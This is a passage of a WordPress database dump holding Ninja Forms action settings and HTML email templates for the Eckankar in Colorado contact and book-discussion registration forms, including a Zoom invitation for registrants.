end.'),(5888,197,'payment_gateways','','payment_gateways',''),(5889,197,'payment_total','0','payment_total','0'),(5890,197,'tag','','tag',''),(5891,197,'email_message_plain','','email_message_plain',''),(5892,197,'submitter_email','','submitter_email',''),(5893,197,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(5894,197,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(5895,197,'set_subs_to_expire','0','set_subs_to_expire','0'),(5896,197,'subs_expire_time','90','subs_expire_time','90'),(5897,197,'date_updated','2016-01-15','date_updated','2016-01-15'),(5898,197,'from_name','','from_name',''),(5899,197,'from_address','','from_address',''),(5900,197,'to','{wp:admin_email}','to','{wp:admin_email}'),(5901,197,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(5902,197,'email_message','{fields_table}','email_message','{fields_table}'),(5903,197,'attach_csv','0','attach_csv','0'),(5904,197,'email_format','html','email_format','html'),(5905,197,'reply_to','','reply_to',''),(5906,197,'cc','','cc',''),(5907,197,'bcc','','bcc',''),(5908,197,'redirect_url','','redirect_url',''),(5909,197,'success_msg','<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p></div>','success_msg','<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p></div>'),(5910,197,'parent_id','35','parent_id','35'),(5911,197,'drawerDisabled','','drawerDisabled',''),(5912,198,'title','','title',''),(5913,198,'key','','key',''),(5914,198,'type','email','type','email'),(5915,198,'active','1','active','1'),(5916,198,'created_at','2018-01-03 11:45:44','created_at','2018-01-03 11:45:44'),(5917,198,'label','Admin Email','label','Admin Email'),(5918,198,'email_message_plain','','email_message_plain',''),(5919,198,'tag','','tag',''),(5920,198,'payment_gateways','','payment_gateways',''),(5921,198,'payment_total','0','payment_total','0'),(5922,198,'objectType','Action','objectType','Action'),(5923,198,'objectDomain','actions','objectDomain','actions'),(5924,198,'editActive','','editActive',''),(5925,198,'message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(5926,198,'date_updated','2016-01-19','date_updated','2016-01-19'),(5927,198,'from_name','Eckankar In Colorado Contact Form','from_name','Eckankar In Colorado Contact Form'),(5928,198,'from_address','contact@eckankar-colorado.org','from_address','contact@eckankar-colorado.org'),(5929,198,'to','webmaster@eckankar-colorado.org','to','webmaster@eckankar-colorado.org'),(5930,198,'email_subject','Loveland Contact - Form Record Received','email_subject','Loveland Contact - Form Record Received'),(5931,198,'email_message','<div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row\"><div class=\"col-md-12 col-xs-12 col-sm-12\"><h1 style=\"color: #23507d;\"><u>ECKANKAR IN LOVELAND</u><br></h1><h3>ADMIN NOTIFICATION:<br></h3><h3><span style=\"font-weight: normal;\">You Have A New Web Contact Form Submission. <br>This form was generated by a user on the Eckankar In Colorado website.</span></h3><h3><span style=\"font-weight: normal;\">Here is a copy of the information submitted by </span>{field:textbox_268}</h3></div></div></div></div><div class=\"row bg-editor-hr-wrap\"><div class=\"col-md-12 col-xs-12 col-sm-12\"><hr></div></div><div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row\" style=\"background-color: #eeeeee;\"><div class=\"col-md-12 col-xs-12 col-sm-12\"><p>&nbsp;</p><p class=\"\" style=\"font-size: 17px;\"><b>First Name:</b>&nbsp; {field:textbox_268}</p><p class=\"\" style=\"font-size: 17px;\"><b>Last Name:</b>&nbsp; {field:lastname_269}</p><p class=\"\" style=\"font-size: 17px;\"><b>Email:&nbsp;</b> {field:email_270}</p><p class=\"\" style=\"font-size: 17px;\"><b>Phone:</b>&nbsp; {field:phone_1599585699152}</p><p class=\"\" style=\"font-size: 17px;\"><b>Message Subject:</b>&nbsp; {field:textbox_303}</p><p class=\"\" style=\"font-size: 17px;\"><b>Message:&nbsp;</b> {field:please_enter_your_message_here_1599585729237}</p><p>&nbsp;</p></div></div></div></div><div class=\"row bg-editor-hr-wrap\"><div class=\"col-md-12 col-xs-12 col-sm-12\"><hr></div></div><div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row\"><div class=\"col-md-12 col-xs-12 col-sm-12\"><p class=\"\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br><br>The Eckankar in Colorado Team<br>https://www.eckankar-colorado.org</p><p>&nbsp;</p><p>&nbsp;</p></div></div></div></div>','email_message','<div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row\"><div class=\"col-md-12 col-xs-12 col-sm-12\"><h1 style=\"color: #23507d;\"><u>ECKANKAR IN LOVELAND</u><br></h1><h3>ADMIN NOTIFICATION:<br></h3><h3><span style=\"font-weight: normal;\">You Have A New Web Contact Form Submission. <br>This form was generated by a user on the Eckankar In Colorado website.</span></h3><h3><span style=\"font-weight: normal;\">Here is a copy of the information submitted by </span>{field:textbox_268}</h3></div></div></div></div><div class=\"row bg-editor-hr-wrap\"><div class=\"col-md-12 col-xs-12 col-sm-12\"><hr></div></div><div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row\" style=\"background-color: #eeeeee;\"><div class=\"col-md-12 col-xs-12 col-sm-12\"><p>&nbsp;</p><p class=\"\" style=\"font-size: 17px;\"><b>First Name:</b>&nbsp; {field:textbox_268}</p><p class=\"\" style=\"font-size: 17px;\"><b>Last Name:</b>&nbsp; {field:lastname_269}</p><p class=\"\" style=\"font-size: 17px;\"><b>Email:&nbsp;</b> {field:email_270}</p><p class=\"\" style=\"font-size: 17px;\"><b>Phone:</b>&nbsp; {field:phone_1599585699152}</p><p class=\"\" style=\"font-size: 17px;\"><b>Message Subject:</b>&nbsp; {field:textbox_303}</p><p class=\"\" style=\"font-size: 17px;\"><b>Message:&nbsp;</b> {field:please_enter_your_message_here_1599585729237}</p><p>&nbsp;</p></div></div></div></div><div class=\"row bg-editor-hr-wrap\"><div class=\"col-md-12 col-xs-12 col-sm-12\"><hr></div></div><div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row\"><div class=\"col-md-12 col-xs-12 col-sm-12\"><p class=\"\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br><br>The Eckankar in Colorado Team<br>https://www.eckankar-colorado.org</p><p>&nbsp;</p><p>&nbsp;</p></div></div></div></div>'),(5932,198,'drawerDisabled','','drawerDisabled',''),(5933,198,'attach_csv','0','attach_csv','0'),(5934,198,'email_format','html','email_format','html'),(5935,198,'reply_to','','reply_to',''),(5936,198,'cc','','cc',''),(5937,198,'bcc','','bcc',''),(5938,198,'redirect_url','','redirect_url',''),(5939,198,'success_msg','','success_msg',''),(5940,198,'parent_id','35','parent_id','35'),(5941,199,'title','','title',''),(5942,199,'key','','key',''),(5943,199,'type','save','type','save'),(5944,199,'active','1','active','1'),(5945,199,'created_at','2018-04-16 20:32:15','created_at','2018-04-16 20:32:15'),(5946,199,'objectType','Action','objectType','Action'),(5947,199,'objectDomain','actions','objectDomain','actions'),(5948,199,'editActive','','editActive',''),(5949,199,'label','Store Submission','label','Store Submission'),(5950,199,'order','3','order','3'),(5951,199,'payment_gateways','','payment_gateways',''),(5952,199,'payment_total','0','payment_total','0'),(5953,199,'tag','','tag',''),(5954,199,'to','{wp:admin_email}','to','{wp:admin_email}'),(5955,199,'reply_to','','reply_to',''),(5956,199,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(5957,199,'email_message','{fields_table}','email_message','{fields_table}'),(5958,199,'email_message_plain','','email_message_plain',''),(5959,199,'from_name','','from_name',''),(5960,199,'from_address','','from_address',''),(5961,199,'email_format','html','email_format','html'),(5962,199,'cc','','cc',''),(5963,199,'bcc','','bcc',''),(5964,199,'redirect_url','','redirect_url',''),(5965,199,'parent_id','50','parent_id','50'),(5966,200,'title','','title',''),(5967,200,'key','','key',''),(5968,200,'type','successmessage','type','successmessage'),(5969,200,'active','1','active','1'),(5970,200,'created_at','2018-04-16 20:32:15','created_at','2018-04-16 20:32:15'),(5971,200,'objectType','Action','objectType','Action'),(5972,200,'objectDomain','actions','objectDomain','actions'),(5973,200,'editActive','','editActive',''),(5974,200,'label','Success Message','label','Success Message'),(5975,200,'message','Your form has been successfully submitted.','message','Your form has been successfully submitted.'),(5976,200,'order','1','order','1'),(5977,200,'payment_gateways','','payment_gateways',''),(5978,200,'payment_total','0','payment_total','0'),(5979,200,'tag','','tag',''),(5980,200,'to','{wp:admin_email}','to','{wp:admin_email}'),(5981,200,'reply_to','','reply_to',''),(5982,200,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(5983,200,'email_message','{fields_table}','email_message','{fields_table}'),(5984,200,'email_message_plain','','email_message_plain',''),(5985,200,'from_name','','from_name',''),(5986,200,'from_address','','from_address',''),(5987,200,'email_format','html','email_format','html'),(5988,200,'cc','','cc',''),(5989,200,'bcc','','bcc',''),(5990,200,'redirect_url','','redirect_url',''),(5991,200,'success_msg','Your form has been successfully submitted.','success_msg','Your form has been successfully submitted.'),(5992,200,'parent_id','50','parent_id','50'),(5993,201,'title','','title',''),(5994,201,'key','','key',''),(5995,201,'type','email','type','email'),(5996,201,'active','1','active','1'),(5997,201,'created_at','2018-04-16 20:32:15','created_at','2018-04-16 20:32:15'),(5998,201,'objectType','Action','objectType','Action'),(5999,201,'objectDomain','actions','objectDomain','actions'),(6000,201,'editActive','','editActive',''),(6001,201,'label','Admin Email','label','Admin Email'),(6002,201,'order','2','order','2'),(6003,201,'payment_gateways','','payment_gateways',''),(6004,201,'payment_total','0','payment_total','0'),(6005,201,'tag','','tag',''),(6006,201,'to','{wp:admin_email}','to','{wp:admin_email}'),(6007,201,'reply_to','','reply_to',''),(6008,201,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(6009,201,'email_message','{fields_table}','email_message','{fields_table}'),(6010,201,'email_message_plain','','email_message_plain',''),(6011,201,'from_name','','from_name',''),(6012,201,'from_address','','from_address',''),(6013,201,'email_format','html','email_format','html'),(6014,201,'cc','','cc',''),(6015,201,'bcc','','bcc',''),(6016,201,'parent_id','50','parent_id','50'),(6017,202,'key','','key',''),(6018,202,'title','','title',''),(6019,202,'type','save','type','save'),(6020,202,'active','1','active','1'),(6021,202,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(6022,202,'label','Store Submission','label','Store Submission'),(6023,202,'objectType','Action','objectType','Action'),(6024,202,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(6025,202,'email_message_plain','','email_message_plain',''),(6026,202,'submitter_email','','submitter_email',''),(6027,202,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(6028,202,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(6029,202,'set_subs_to_expire','0','set_subs_to_expire','0'),(6030,202,'subs_expire_time','90','subs_expire_time','90'),(6031,202,'success_msg','Your form has been successfully submitted.','success_msg','Your form has been successfully submitted.'),(6032,202,'drawerDisabled','','drawerDisabled',''),(6033,202,'objectDomain','actions','objectDomain','actions'),(6034,202,'editActive','','editActive',''),(6035,202,'order','3','order','3'),(6036,202,'payment_gateways','','payment_gateways',''),(6037,202,'payment_total','0','payment_total','0'),(6038,202,'tag','','tag',''),(6039,202,'to','{wp:admin_email}','to','{wp:admin_email}'),(6040,202,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(6041,202,'email_message','{fields_table}','email_message','{fields_table}'),(6042,202,'from_name','','from_name',''),(6043,202,'from_address','','from_address',''),(6044,202,'reply_to','','reply_to',''),(6045,202,'email_format','html','email_format','html'),(6046,202,'cc','','cc',''),(6047,202,'bcc','','bcc',''),(6048,202,'attach_csv','','attach_csv',''),(6049,202,'redirect_url','','redirect_url',''),(6050,202,'parent_id','44','parent_id','44'),(6051,203,'email_subject','Thank you for registering for our event','email_subject','Thank you for registering for our event'),(6052,203,'tag','','tag',''),(6053,203,'payment_total','0','payment_total','0'),(6054,203,'order','2','order','2'),(6055,203,'payment_gateways','','payment_gateways',''),(6056,203,'message','{all_fields_table}','message','{all_fields_table}'),(6057,203,'reply_to','','reply_to',''),(6058,203,'email_format','html','email_format','html'),(6059,203,'key','','key',''),(6060,203,'type','email','type','email'),(6061,203,'active','1','active','1'),(6062,203,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(6063,203,'label','User Email Confirmation','label','User Email Confirmation'),(6064,203,'objectType','Action','objectType','Action'),(6065,203,'title','','title',''),(6066,203,'subject','Ninja Forms Submission','subject','Ninja Forms Submission'),(6067,203,'editActive','','editActive',''),(6068,203,'to','{field:email}','to','{field:email}'),(6069,203,'objectDomain','actions','objectDomain','actions'),(6070,203,'from_name','','from_name',''),(6071,203,'from_address','{system:admin_email}','from_address','{system:admin_email}'),(6072,203,'cc','','cc',''),(6073,203,'bcc','','bcc',''),(6074,203,'attach_csv','','attach_csv',''),(6075,203,'parent_id','44','parent_id','44'),(6076,203,'email_message_plain','','email_message_plain',''),(6077,203,'drawerDisabled','','drawerDisabled',''),(6078,203,'email_message','<div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row\"><div class=\"col-md-12 col-xs-12 col-sm-12\"><p><!-- [if mso]>  </p><style>    table {border-collapse:collapse;border-spacing:0;border:none;margin:0;}    div, td {padding:0;}    div {margin:0 !important;}	</style><p>  <noscript>                  96            </noscript>  <![endif]--></p></div></div></div></div><div style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\"><table style=\"width: 100%; border: solid 1px #cccccc; border-spacing: 0;\"><tbody><tr><td style=\"padding: 0;\" align=\"center\"><p><!-- [if mso]>          </p><table role=\"presentation\" align=\"center\" style=\"width:600px;\"><tr><td><p>          <![endif]--></p><table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\"><tbody><tr><td style=\"padding: 0;\" align=\"center\"><p><!-- [if mso]>          </p><table role=\"presentation\" align=\"center\" style=\"width:600px;\"><tr><td><p>          <![endif]--></p><table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\"><tbody><tr><td style=\"padding: 40px 30px 30px 30px; text-align: center; font-size: 40px; font-weight: bold; color: #23507d; font-family: Georgia, serif; background-color: #c0dbf6;\">Eckankar In Colorado<br><br><span style=\"padding: 0px 0px 0px 0px; text-align: center; font-size: 22px; font-weight: bold; color: #333333; font-family: Arial, sans-serif; line-height: 25px;\">Book Discussion Registration</span><br><span style=\"padding: 0px 0px 0px 0px; text-align: center; font-size: 25px; font-weight: bold; color: #333333; font-family: Arial, sans-serif; line-height: 25px;\">&nbsp;</span> <span style=\"padding: 0px 0px 0px 0px; text-align: center; font-size: 25px; font-weight: bold; color: #23507d; font-family: Arial, sans-serif; line-height: 25px;\">\"Autobiography of a Modern Prophet\"</span></td></tr><tr><td style=\"padding: 30px; padding-top: 10px; background-color: #ffffff;\"><p style=\"font-size: 16px;\"><span style=\"color: #333333; font-size: 20px;\">Hello {field:firstname},<br></span></p><p style=\"font-size: 16px;\"><span style=\"color: #333333; font-size: 20px;\">Thank You For Registering! <br></span></p><p style=\"font-size: 18px;\"><strong>You Are Signed Up For The Following Loveland Book Discussion:<br>&nbsp;<span style=\"color: #23507d; font-size: 19px;\">\"Autobiography of a Modern Prophet\" -Online<br></span><br></strong><span style=\"color: #333333; font-size: 19px;\">This class started on <strong>August 22, 2021</strong> and will occur</span><span style=\"color: #333333; font-size: 19px; font-weight: bold;\">&nbsp;every 4th Sunday (12 occurrences) -- </span><span style=\"color: #333333; font-size: 19px; font-weight: bold;\">10:30 a.m. - 11:30 a.m.</span></p><p style=\"font-size: 22px; color: #f28a27;\"><strong>Zoom Login Information:</strong></p><p><strong>Meeting ID:</strong> 851 6644 0213 <br><strong>Passcode:&nbsp;</strong>675002<br><br>https://us02web.zoom.us/j/85166440213?pwd=QzRPejg4VkV2aWFONUZ0cTBBeFhoZz09<br><br>After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p><p><strong>Dial-in number for those who need to join by phone:<br></strong>Find your local number: https://us02web.zoom.us/u/kwguM8maE<br><br>Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.<br><br>See you there!</p></td></tr><tr><td style=\"padding: 30px; background-color: #efefef; font-family: Arial, Helvetica, sans-serif; font-size: 15px; text-align: center;\"><p style=\"margin: 0;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado website.</a></p><p style=\"text-align: center; font-family: Arial, Helvetica, sans-serif; font-size: 15px;\">If you have any questions regarding the origin of this email, please feel free to get in touch, we\'re always happy to help out.</p></td></tr><tr><td style=\"padding: 30px; text-align: center; font-size: 12px; background-color: #747474; color: #cccccc;\"><p style=\"margin: 0 0 8px 0;\"><a style=\"text-decoration: none;\" href=\"https://www.facebook.com/Eckankar-in-Colorado-104663979586166/\"><img class=\"fr-fic fr-dii\" style=\"color: #cccccc;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\"></a>&nbsp;</p><p style=\"margin: 0; font-size: 14px; line-height: 20px;\">© Eckankar In Colorado -2021<br><a class=\"unsub\" style=\"color: #cccccc; text-decoration: underline;\" href=\"mailto:webmaster@eckankar-colorado.org\">Contact Us</a></p></td></tr></tbody></table><p><!-- [if mso]>          </td></tr></table><p>          <![endif]--></p></td></tr></tbody></table></td></tr></tbody></table></div><div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row\"><div class=\"col-md-12 col-xs-12 col-sm-12\"></div></div></div></div>','email_message','<div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row\"><div class=\"col-md-12 col-xs-12 col-sm-12\"><p><!-- [if mso]>  </p><style>    table {border-collapse:collapse;border-spacing:0;border:none;margin:0;}    div, td {padding:0;}    div {margin:0 !important;}	</style><p>  <noscript>                  96            </noscript>  <![endif]--></p></div></div></div></div><div style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\"><table style=\"width: 100%; border: solid 1px #cccccc; border-spacing: 0;\"><tbody><tr><td style=\"padding: 0;\" align=\"center\"><p><!-- [if mso]>          </p><table role=\"presentation\" align=\"center\" style=\"width:600px;\"><tr><td><p>          <![endif]--></p><table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\"><tbody><tr><td style=\"padding: 0;\" align=\"center\"><p><!-- [if mso]>          </p><table role=\"presentation\" align=\"center\" style=\"width:600px;\"><tr><td><p>          <![endif]--></p><table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\"><tbody><tr><td style=\"padding: 40px 30px 30px 30px; text-align: center; font-size: 40px; font-weight: bold; color: #23507d; font-family: Georgia, serif; background-color: #c0dbf6;\">Eckankar In Colorado<br><br><span style=\"padding: 0px 0px 0px 0px; text-align: center; font-size: 22px; font-weight: bold; color: #333333; font-family: Arial, sans-serif; line-height: 25px;\">Book Discussion Registration</span><br><span style=\"padding: 0px 0px 0px 0px; text-align: center; font-size: 25px; font-weight: bold; color: #333333; font-family: Arial, sans-serif; line-height: 25px;\">&nbsp;</span> <span style=\"padding: 0px 0px 0px 0px; text-align: center; font-size: 25px; font-weight: bold; color: #23507d; font-family: Arial, sans-serif; line-height: 25px;\">\"Autobiography of a Modern Prophet\"</span></td></tr><tr><td style=\"padding: 30px; padding-top: 10px; background-color: #ffffff;\"><p style=\"font-size: 16px;\"><span style=\"color: #333333; font-size: 20px;\">Hello {field:firstname},<br></span></p><p style=\"font-size: 16px;\"><span style=\"color: #333333; font-size: 20px;\">Thank You For Registering! <br></span></p><p style=\"font-size: 18px;\"><strong>You Are Signed Up For The Following Loveland Book Discussion:<br>&nbsp;<span style=\"color: #23507d; font-size: 19px;\">\"Autobiography of a Modern Prophet\" -Online<br></span><br></strong><span style=\"color: #333333; font-size: 19px;\">This class started on <strong>August 22, 2021</strong> and will occur</span><span style=\"color: #333333; font-size: 19px; font-weight: bold;\">&nbsp;every 4th Sunday (12 occurrences) -- </span><span style=\"color: #333333; font-size: 19px; font-weight: bold;\">10:30 a.m. - 11:30 a.m.</span></p><p style=\"font-size: 22px; color: #f28a27;\"><strong>Zoom Login Information:</strong></p><p><strong>Meeting ID:</strong> 851 6644 0213 <br><strong>Passcode:&nbsp;</strong>675002<br><br>https://us02web.zoom.us/j/85166440213?pwd=QzRPejg4VkV2aWFONUZ0cTBBeFhoZz09<br><br>After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p><p><strong>Dial-in number for those who need to join by phone:<br></strong>Find your local number: https://us02web.zoom.us/u/kwguM8maE<br><br>Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.<br><br>See you there!</p></td></tr><tr><td style=\"padding: 30px; background-color: #efefef; font-family: Arial, Helvetica, sans-serif; font-size: 15px; text-align: center;\"><p style=\"margin: 0;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado website.</a></p><p style=\"text-align: center; font-family: Arial, Helvetica, sans-serif; font-size: 15px;\">If you have any questions regarding the origin of this email, please feel free to get in touch, we\'re always happy to help out.</p></td></tr><tr><td style=\"padding: 30px; text-align: center; font-size: 12px; background-color: #747474; color: #cccccc;\"><p style=\"margin: 0 0 8px 0;\"><a style=\"text-decoration: none;\" href=\"https://www.facebook.com/Eckankar-in-Colorado-104663979586166/\"><img class=\"fr-fic fr-dii\" style=\"color: #cccccc;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\"></a>&nbsp;</p><p style=\"margin: 0; font-size: 14px; line-height: 20px;\">© Eckankar In Colorado -2021<br><a class=\"unsub\" style=\"color: #cccccc; text-decoration: underline;\" href=\"mailto:webmaster@eckankar-colorado.org\">Contact Us</a></p></td></tr></tbody></table><p><!-- [if mso]>          </td></tr></table><p>          <![endif]--></p></td></tr></tbody></table></td></tr></tbody></table></div><div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row\"><div class=\"col-md-12 col-xs-12 col-sm-12\"></div></div></div></div>'),(6079,204,'drawerDisabled','','drawerDisabled',''),(6080,204,'title','','title',''),(6081,204,'key','','key',''),(6082,204,'type','email','type','email'),(6083,204,'active','1','active','1'),(6084,204,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(6085,204,'label','Admin Email Notification','label','Admin Email Notification'),(6086,204,'objectType','Action','objectType','Action'),(6087,204,'objectDomain','actions','objectDomain','actions'),(6088,204,'editActive','1','editActive','1'),(6089,204,'to','webmaster@eckankar-colorado.org','to','webmaster@eckankar-colorado.org'),(6090,204,'subject','Ninja Forms Submission','subject','Ninja Forms Submission'),(6091,204,'message','{all_fields_table}','message','{all_fields_table}'),(6092,204,'order','2','order','2'),(6093,204,'payment_gateways','','payment_gateways',''),(6094,204,'payment_total','0','payment_total','0'),(6095,204,'tag','','tag',''),(6096,204,'email_subject','New Book Discussion Registration from {field:firstname} {field:lastname}','email_subject','New Book Discussion Registration from {field:firstname} {field:lastname}'),(6097,204,'email_message','<meta http-equiv=\"content-type\" content=\"text/html; charset=windows-1252\">        <div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust:100%;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%;background-color:#ffffff;\" lang=\"en\">      <table role=\"presentation\" style=\"width:100%;border:none;border-spacing:0;\">        <tbody>          <tr>            <td style=\"padding:0;\" align=\"center\">              <!--[if mso]>          <table role=\"presentation\" align=\"center\" style=\"width:600px;\">          <tr>          <td>          <![endif]-->              <table role=\"presentation\" style=\"width:94%;max-width:600px;border:none;border-spacing:0;text-align:left;font-family:Arial,sans-serif;font-size:16px;line-height:22px;color:#363636;\">                <tbody>                  <tr>                    <td style=\"padding: 0;\" align=\"center\"><!-- [if mso]>          <table role=\"presentation\" align=\"center\" style=\"width:600px;\">          <tr>          <td>          <![endif]-->                      <table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">                        <tbody>                          <tr>                            <td style=\"padding: 40px 30px 30px 30px; text-align: center; font-size: 30px; font-weight: bold; color: #ffffff; font-family: Georgia, serif; background-color:#1d5791;\">Eckankar In Colorado<br>                              <br><div align=\"center\"><div align=\"center\"><span style=\"padding:40px 30px 30px 30px; text-align: center; font-size: 28px; font-weight: bold; color: #f28a27; font-family: Arial, sans-serif; line-height: 25px;\">New Book Discussion</span></div><div align=\"center\"><span style=\"padding:40px 30px 30px 30px; text-align: center; font-size: 28px; font-weight: bold; color: #f28a27; font-family: Arial, sans-serif; line-height: 25px;\">Registration</span><br></div><span style=\"padding:40px 30px 30px 30px; text-align: center; font-size: 28px; font-weight: bold; color: #f28a27; font-family: Arial, sans-serif; line-height: 25px;\"></span></div></td>                          </tr>                          <tr>                            <td style=\"padding-left: 30px; padding-right 30px; background-color: #ffffff;\">                              <p class=\"\" style=\"font-size: 17px;\"><span style=\"color: #333333; font-size: 20px;\"><b><span id=\"nf-drawer-content\"><span class=\"nf-setting-groups\"><span class=\"nf-field-settings\">                                        </span></span></span></b></span></p>                              <p class=\"\" style=\"font-family: Open Sans; font-weight: 400; font-size: 20px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><b>Admin                                  Notification<br>                                </b></p>                              <b>                                <p class=\"\" style=\"font-family: Open Sans; font-weight: 400; font-size: 18px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">A                                  new Book Discussion registration                                  has been received for <br>\"<span style=\"font-size: 19px; line-height: 125%; color: #000000;\"><b><span style=\"font-size: 19px; line-height: 125%; color: #000000;\"><span style=\"color: #0963ba;\"><span style=\"color: #000000;\"><em>Autobiography of a Modern Prophet</em></span></span></span></b>\"</span>.&nbsp; </p><p style=\"line-height: 125%; margin-top: 0px; margin-bottom: 0px;\"><span style=\"color: #333333; font-size: 20px;\">Loveland Class information:<br></span><span style=\"font-size: 20px; line-height: 125%; color: #000000;\"><strong><span style=\"line-height: 125%; color: #000000;\">10:30 <span style=\"line-height: 125%; color: #000000;\"><strong><span style=\"line-height: 125%; color: #000000;\">am </span></strong></span>- 11:30 pm - (4th Sunday - 12 Occurrences)</span></strong></span></p></b><b>                              </b>                              <p></p>                            </td>                          </tr>                          <tr>                            <td style=\"padding: 30px; background-color: #efefef; font-family: Arial, Helvetica, sans-serif; font-size: 18px; text-align: left;\"><b>Registrant                                Information:</b><br>                              <br>                              <b>Name:</b>&nbsp; <span style=\"display: inline-block;\">{field:firstname}                                {field:lastname}<br>                              </span>                              <p style=\"font-family: Arial, Helvetica, sans-serif; font-size: 18px; text-align: left;\">                                <b>Email:</b>&nbsp;                                {field:email}</p>                            </td>                          </tr>                          <tr>                            <td style=\"padding: 30px; text-align: center; font-size: 16px; background-color: #747474; color: #cccccc;\">Regards,<br>                              Your ECK in Colorado                              Website</td>                          </tr>                        </tbody>                      </table>                      <!-- [if mso]>          </td>          </tr>          </table>          <![endif]-->                    </td>                  </tr>                </tbody>              </table>            </td>          </tr>        </tbody>      </table>    </div>','email_message','<meta http-equiv=\"content-type\" content=\"text/html; charset=windows-1252\">        <div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust:100%;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%;background-color:#ffffff;\" lang=\"en\">      <table role=\"presentation\" style=\"width:100%;border:none;border-spacing:0;\">        <tbody>          <tr>            <td style=\"padding:0;\" align=\"center\">              <!--[if mso]>          <table role=\"presentation\" align=\"center\" style=\"width:600px;\">          <tr>          <td>          <![endif]-->              <table role=\"presentation\" style=\"width:94%;max-width:600px;border:none;border-spacing:0;text-align:left;font-family:Arial,sans-serif;font-size:16px;line-height:22px;color:#363636;\">                <tbody>                  <tr>                    <td style=\"padding: 0;\" align=\"center\"><!-- [if mso]>          <table role=\"presentation\" align=\"center\" style=\"width:600px;\">          <tr>          <td>          <![endif]-->                      <table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">                        <tbody>                          <tr>                            <td style=\"padding: 40px 30px 30px 30px; text-align: center; font-size: 30px; font-weight: bold; color: #ffffff; font-family: Georgia, serif; background-color:#1d5791;\">Eckankar In Colorado<br>                              <br><div align=\"center\"><div align=\"center\"><span style=\"padding:40px 30px 30px 30px; text-align: center; font-size: 28px; font-weight: bold; color: #f28a27; font-family: Arial, sans-serif; line-height: 25px;\">New Book 